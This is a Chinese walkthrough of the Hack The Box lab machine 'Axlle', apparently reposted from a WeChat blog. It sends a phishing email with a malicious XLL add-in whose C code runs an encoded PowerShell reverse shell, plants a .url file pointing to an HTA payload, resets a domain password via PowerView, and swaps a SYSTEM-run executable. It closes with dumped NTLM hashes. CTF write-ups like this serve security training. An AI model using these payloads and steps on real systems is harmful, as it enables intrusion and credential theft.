扫描靶机
nmap -T4 -v -A 10.10.11.21
从上面看,这机器开了常规的端口,还开了3389端口,同时也得到了一个域名axlle.htb,查看一下网站
在这里可以得到一个信息,有什么问题就联系[email protected],而且是以发邮件的形式联系,可以联想到邮件钓鱼,而且机器的图标就是钓鱼,枚举smb的用户也无果
尝试跑一下目录,跑了许久也没有得到信息
子域名也没有跑出,看来或许是从邮件入手,先测试一下能否发送
swaks --to accounts.htb --from ikun.kun --header "Subject: Ikun" --body "let s join ikun." --attach .pdf
从上面分析成功将一封带有kun.pdf附件的邮件从[email protected]发送到[email protected],试了hta,exe,dll都没用,只能换成xll格式上传,可以参考这篇文章,也可以使用这个,(能理解机器的名字了,a xll email~~)
从上面分析成功将一封带有kun.pdf附件的邮件从[email protected]发送到[email protected],试了hta,exe,dll都没用,只能换成xll格式上传,可以参考这篇文章,也可以使用这个,(能理解机器的名字了,a xll email~~)
https://github.com/moohax/xllpoc
https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec
__declspec(dllexport) void __cdecl xlAutoOpen(void);void __cdecl xlAutoOpen() {WinExec("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA1ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==", 1);}BOOL APIENTRY DllMain(HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) {switch (ul_reason_for_call) {case DLL_PROCESS_ATTACH:case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}
然后将该c语言生成xll,使用gcc
x86_64-w64-mingw32-gcc -fPIC -shared -o cxk.xll cxk.c -luser32然后直接使用swaks发邮件,等会儿,autobot会自动运行
swaks --to accounts.htb --from ikun.kun --header "Subject: Ikun" --body "let s join ikun." --attach .xll
成功反弹了shell,输入net share可以查看到C:inetpubtesting路径,通常用于网站测试或开发环境,因为该机器开放了邮件服务器,可以在C:Program Files (x86)hmailserver目录找到该服务器的数据,点击data里面有个dallon.matrix,已经提示到了,如果提权就会到dallon.matrix用户
查看里面可以得到一封邮件,里面写的是C:inetpubtesting文件夹的作用,放一个lnk或者url过一段时间autobot会自动运行,所以可以做一个payload的url文件放那里
[InternetShortcut]URL=C:UsersPublicxx.hta
然后等待执行url脚本,成功的反弹了shell
成功拿到了一个user flag,老规矩上传SharpHound收集一下信息
分析一下bloodhound
可以看到WEB [email protected]组对[email protected]用户有ForceChangePassword的权限,[email protected]对MAINFRAME.AXLLE.HTB有CanPSRemote,说明了JACOB.GREENY用户可以直接与MAINFRAME.AXLLE.HTB交互,WEB [email protected]组里面的成员都继承了[email protected]用户的ForceChangePassword权限,可以重置[email protected]用户密码,所以使用powerview工具修改密码,然后runas登录,可以直接交互计算机
$UserPassword = ConvertTo-SecureString 'Cxkyyds123!' -AsPlainText -ForceSet-DomainUserPassword -Identity JACOB.GREENY -AccountPassword $UserPassword
修改完密码直接使用美少妇的runas模块登录
输入dir命令可以在底下看到一个App Development
然后一直进去就会看到一个README.md文档,可以查看一下
其中中间有一段很长的一句话
**NOTE: I have automated the running of `C:Program Files (x86)Windows Kits10TestingStandaloneTestingInternalx64standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**猜测这个exe是跟这个用户有关系的,去到那里,查看一下使用icacls命令查看
可以看到everyone有读取和执行权限,除了他其他大部分都有,所以尝试将源程序更换,换成payload
等一会儿autobot会自动运行,成功反弹shell
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6322b5b9f9daecb0fefd594fa6fafb6a:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d92f4784b46504cf3bedbc702ac03fe:::david.brice:1109:aad3b435b51404eeaad3b435b51404ee:0279f2a1f290ff139458088afb45fa3f:::frankie.rose:1110:aad3b435b51404eeaad3b435b51404ee:80c10c678c9b31e2091065c90519e529:::brad.shaw:1111:aad3b435b51404eeaad3b435b51404ee:9cefad58a9a2188687922a6cc10485a3:::samantha.jade:1112:aad3b435b51404eeaad3b435b51404ee:8047ec8cda0666f4e1c1be0ddc2d0378:::gideon.hamill:1113:aad3b435b51404eeaad3b435b51404ee:aa753e07e1fd47a45e0ecb3a0cc70dab:::xavier.edmund:1114:aad3b435b51404eeaad3b435b51404ee:9ecaa82cc22e0e1534493a03276dc02b:::emily.cook:1115:aad3b435b51404eeaad3b435b51404ee:b35775e6e9d3af6c0dcf33cef162986d:::brooke.graham:1116:aad3b435b51404eeaad3b435b51404ee:bcd1044566a9fb7fe130bdd5bcce7db1:::trent.langdon:1117:aad3b435b51404eeaad3b435b51404ee:a4bbfacd030508d12f3a203bbab8b1f8:::matt.drew:1118:aad3b435b51404eeaad3b435b51404ee:eb116285721b66b71d98803716b94616:::jess.adams:1119:aad3b435b51404eeaad3b435b51404ee:933d10a14def0ed5ffbd708092d92e4d:::jacob.greeny:1120:aad3b435b51404eeaad3b435b51404ee:4ab346b3e7d97ac8b0156dd947d19bf1:::simon.smalls:1121:aad3b435b51404eeaad3b435b51404ee:d14ddd0880870e9d7fcb442653b6183e:::dan.kendo:1122:aad3b435b51404eeaad3b435b51404ee:3fa7f786ca68123db7fdef522cb93a22:::lindsay.richards:1123:aad3b435b51404eeaad3b435b51404ee:71d62e4384f2e9b92169a10a29539b2d:::calum.scott:1124:aad3b435b51404eeaad3b435b51404ee:35a376bb58095b4a559fbceccdb01364:::dallon.matrix:1125:aad3b435b51404eeaad3b435b51404ee:124a4a99bf67ca4b04e2266f967daa64:::baz.humphries:1126:aad3b435b51404eeaad3b435b51404ee:ecfc37e6e4797f9ae97b61f0265c0561:::MAINFRAME$:1000:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::
来,因为机器开了3389端口,启动rdp~~,留下ikun的足迹,密码是:Xj!#$12KlMn
进去了他在运行脚本
原文始发于微信公众号(Jiyou too beautiful):HTB-Axlle笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论